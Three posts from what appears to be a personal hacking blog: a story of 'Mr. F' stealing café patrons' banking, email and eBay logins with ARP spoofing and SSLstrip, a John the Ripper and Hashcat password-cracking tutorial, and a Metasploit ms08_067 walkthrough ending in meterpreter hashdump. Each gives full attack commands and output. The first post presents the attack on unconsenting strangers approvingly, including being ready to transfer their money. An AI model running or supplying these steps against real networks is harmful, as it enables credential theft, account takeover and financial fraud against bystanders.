"And a happy new (F)ear!" ...SslStrip said !

Hello,
          Merry Christmas everyone! Today,  26/12/12 I will tell you a story which Mr. F told me yesterday. Actually, it's a horror story, which none of us would like to be protagonist!

 Sit comfortably and pay attention.

"Mr. F was on holidays (since 23/12/12) and he wanted to hang out for a coffee. He took his netbooks's case, he wore a jean and after an hour he was drinking a coffee at Syntagma square (Attiki - Syntagma, Athens). While he was listening to the well-known horrible music of the coffee shop, he decided to turn on his asus netbook and perform a simple Port Scan with his favorite port scanner, Nmap. At first, he didn't noticed anything, but after a while, a huge list of available host's was displayed in his 10.1 inch screen. 'Wow' , he said! 'It's my lucky day.' After that, a crazy idea crossed Mr. F's mind. He  called John, (Best friend), to ask him for sending Sslstrip via Dropbox.  I'm sure everyone knows what Mr. F will attempt to do. While he was waiting for the Sslstrip, he continued drinking his coffee and relaxing. Then, we pressed 'F5' on his Dropbox account, and he suddenly show an new folder named 'Sslstrip 0.9' with a tar.gz file inside. He extracted it, he checked if everything works great and he started thinking.

He didn't type anything for 2 minutes. He was thinking, what I must do now? The final thought was to enable port forwarding with the following command : $echo '1' > /proc/sys/net/ipv4/ip_forward . And that's what he entered. Then he checked if the ip_forward was '1' instead of '0'. 'Everything is ok', he thought. After a while, he typed the 2nd command: $iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080. 'With the above command , I will redirect requests from port 80 to port 8080 and I will be able to reassure the connections with destination the correct port'. After that, he was ready to type the 3rd command!

Read more : http://vishnuvalentino.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrac

That was $arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1 . With the above command he would be able to perform an ARP MITM attack between Target ( 192.168.1.7) and Host(192.168.1.1) . - You can easily notice that he didn't use broadcast arpspoof. The reason is that, he actually tried it, but the network was crashing! -  'Perfect!' he said, while he was watching the network traffic! 

'I am ready', he said. 'I am ready to proceed to the final step!' Can you guess the final step? He only, had to make Sslstrip listening on port 8080. 'Very easy', he said. 'I only have to type : $ python sslstrip.py -l 8080 and then, I will wait as long as I need.'
He entered the command, he drunk his water ( He had already had his coffee) and he was waiting for the magic moment! 

  

He made some calls, he browsed facebook, he played some mobile-games and after 20' he decided to stop sslstrip and he browsed the .log file. The results was awesome. Banking, Facebook, Ebay , Gmail, Hotmail account had been logged into Ssslstrip Log file! He was able to have access in any account. He was ready to buy products, browse emails, transfer money and other things! 

Ebay account example

After he finished with that, he closed his netbook, he paid the waiter and he left the coffee shop by singing ' I wish you a Merry Christmas, I wish you a Merry Christmas ... and a Happy New (F)ear!!!' 

Are you still here? Do you still feel safe with https? Mr. F hopes so. ;)

Thanks,
              Nikos Danopoulos


 
 

Password Cracking : John The Ripper & Hashcat!

Hello everyone,

                             Today,  I'm gonna show you how to crack MD4, MD5, SHA1,  and other hash types by using John The Ripper and Hashcat.

John The Ripper:  "John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version." 

Source: http://www.openwall.com/john/ 

Hashcat: "Hashcat is the world’s fastest CPU-based password recovery tool.

While it's not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches."

Source: http://hashcat.net/wiki/doku.php?id=hashcat

Download John The Ripper(Jumpo 1.7.9) : John The Ripper Jumpo 1.7.9
Download Hashcat(0.41): Hashcat v0.41

Install both John and Hashcat and we are ready to start.
It's time to launch them. Go to the John's installation folder (JohnTheRipper-unstable-jumbo/run/) and type $./john to launch John.

Requirements for cracking a password with John: Wordlist, encrypted password.

Here is a site which you are able to convert a word into md5 hash.

In the following list you can find some great wordlists. ( I suggest you, to use an English dictionary as Wordlist ) 

ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/
ftp://ftp.openwall.com/pub/wordlists/
http://www.skullsecurity.org/wiki/index.php/Passwords

Now, it's time to try cracking passwords with John. We will use those passwords-hashes

 b326b5062b2f0e69046810717534cb09
 d41134fbdb1aacda7ccdb49ed3d33948
 37b4e2d82900d5e94b8da524fbeb33c0
 4ed5d2eaed1a1fadcc41ad1d58ed603e
 e09491aee3bd9ec02e805ffdac0beb12

Open your test.txt file and insert the above hashes. We also know that the passwords are using a Md5 encryption.
 So we have a test.txt file with the hashes, and we know the md5 format of the hashes!

1st CHALLENGE:

$./john --format=raw-md5 --single test.txt

--format=raw-md5 is the format/type of the hash (md5 in this case) 
--single is the single mode which John provide us for cracking passwords faster without using our wordlist



RESULT: 

 Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])

SCORE: Passwords 1 - 0 John

2nd CHALLENGE:

$./john --format=raw-md5 --wordlist=word_list_file.txt test.txt  

--wordlist=word_list_file.txt is the command which we select our wordlist (change the "word_list_file.txt" with your wordlist's name

RESULT: 

Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])
city             (4)
scary            (2)
observation    (5) 
true             (1)
football         (3)
 

SCORE: Passwords 1 - 1 John the Ripper!

If you wish to see your cracked hashes you can type:
$./john --show --format=raw-md5 test.txt 

What about cracking some SHA-1 hashes? For SHA-1 I will use the following hashes:

52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b 

 3rd CHALLENGE:

$./john --format=raw-sha1 --wordlist=wordlist_file.txt test.txt

--format=raw-sha1 the hash type is sha-1

Loaded 5 password hashes with no different salts (Raw SHA-1 [128/128 SSE2 4x])
auto             (?)
reincarnation    (?)
manual           (?)
respect          (?)
security         (?) 

SCORE:  Passwords 1 - 2 John The Ripper



Ok, now it's time to crack some passwords with Hashcat. We will use the same hashes with those we used before.

 b326b5062b2f0e69046810717534cb09
 d41134fbdb1aacda7ccdb49ed3d33948
 37b4e2d82900d5e94b8da524fbeb33c0
 4ed5d2eaed1a1fadcc41ad1d58ed603e
 e09491aee3bd9ec02e805ffdac0beb12

1st CHALLENGE:

$./hashcat-cli32.bin 'test.txt' 'wordlistfile.txt' 

'text.txt' is the file where the hashes are included
'wordlistfile.txt'  is the wordlist

 RESULT:

Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary

All hashes have been recovered

SCORE: Passwords 0 - 1 Hashcat

2nd CHALLENGE:

$./hashcat-cli32.bin -m0 'test.txt' 'wordlistfile.txt' 

-m0 is the format type of the hash. -m means that we want to crack a specific type of hash an 0 means that the hash type is MD5.

RESULT:


Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary
All hashes have been recovered
 

SCORE: Passwords 0 - 2 Hashcat   


3rd CHALLENGE:

In this challenge we will crack SHA-1 hashes. We will use the same hashes as before.


52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b 

$./hashcat-cli32.bin -m100 'test.txt' 'wordlistfile.txt'

-m100 means that we want to crack SHA-1 hashes. 100=SHA-1

RESULT:

14012cd1b375ede06f6334b34167397cb7be4265:respect
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8:auto
8eec7bc461808e0b8a28783d0bec1a3a22eb0821:security
52c281dfd1301b71d268ecc736ee500502a2be87:reincarnation
All hashes have been recovered

 
SCORE: Passwords 0 - 3 Hashcat


 Many people believe, that Hashcut is faster and simpler. And that's true! After the above results, what's your opinion? 


Thanks,
               Nikos Danopoulos
 
 

Identify,scan & exlpoit a Windows system

Hello everyone,

    The following tutorial is based in a realistic scenario and I'm gonna show you how to identify,scan and exploit a Windows XP OS.
    The victim is running Windows XP OS and the attacker Linux Mint(Maya 13) OS.   
   
    So, the first step is to identify the alive hosts in the attacking network. An alive host is a host which responds to an ICMP echo request(Ping). For further information about ICMP request, just have a look here( http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol ).
   
     Let's say that the networks IP is 10.50.97.0/24 . Now, to find  alive hosts you have to launch nmap ( http://nmap.org/ ) and performing a Ping scan by typing the following command:
   
    $ sudo nmap -v 10.50.97.0/24 

  The output should be something like this:
   

   

    The above command will start Nmap tool and perform an ping  and port scan from host 10.50.97.0 to 10.50.97.255 .If you want to perform a ping scan just change -v with -sn . 

   
    After finding the alive hosts we have to identify their Operating Systems. To do this just type:

$ sudo nmap -O [alive host's ip]
   
    With the above command you will ask for Operating System detection (-O). My output looks like this:

  
     After having a quick check in the output we can simply learn the target's OS.
   
    After identifying the host we have to scan it for open ports,services,vulnerabilities.You can check for open ports and services by typing :

$ sudo nmap -sV [target's ip].

    The above command probes open ports to determine service information.
   
   
   
   Now, after gathering useful information we are gonna perform a vulnerability scan for identifying open ports, more infos and common vulnerabilities which we are gonna try to exploit  later.
  
   To do this, we have to launch a vulnerability scan with Nessus tool.
  
   Wait a couple of minutes.After vulnerability scan been completed check the report.
  
  
  OK! Here are the infos we have:

  1) Vulnerable Host's Ip
  2) Target's Operating System
  3) Services Informations
  4) Open ports , other information , vulnerabilities
 
  The next step, is to run the Metasploit Framework. With Metasploit we will exploit the vulnerabilities of the target.
  So, after launching Metasploit we should select the exploit we need. (Check  your nessus report for finding your exploit name). In this case, I'm gonna use the "ms08_067" exploit. To do this type in metasploit field  :

  "use exploit/windows/smb/ms08_067_netapi"
 
  'use' is the command which says to metasploit which exploit to use.
 
  Now, type "show options" to see your exploit's options.Fill the empty fields,such as "RHOST" ,"RPORT" etc. Like the following example:

 

After completing the above step it's time to run our exploit. To do this,  just type "exploit" and wait for the exploit to run.

 
  The following picture is an example of my metasploit session.

 
 

 
  Once meterpreter session is opened you can easily get some screenshots of the target machine by typing
  "screenshot" , show some passwords by typing "hashdump" and other cool thinks!
                                                                     
 
  Have your coffee and enjoy your meterpreter session!
 
  Thanks,
      Nikos Danopoulos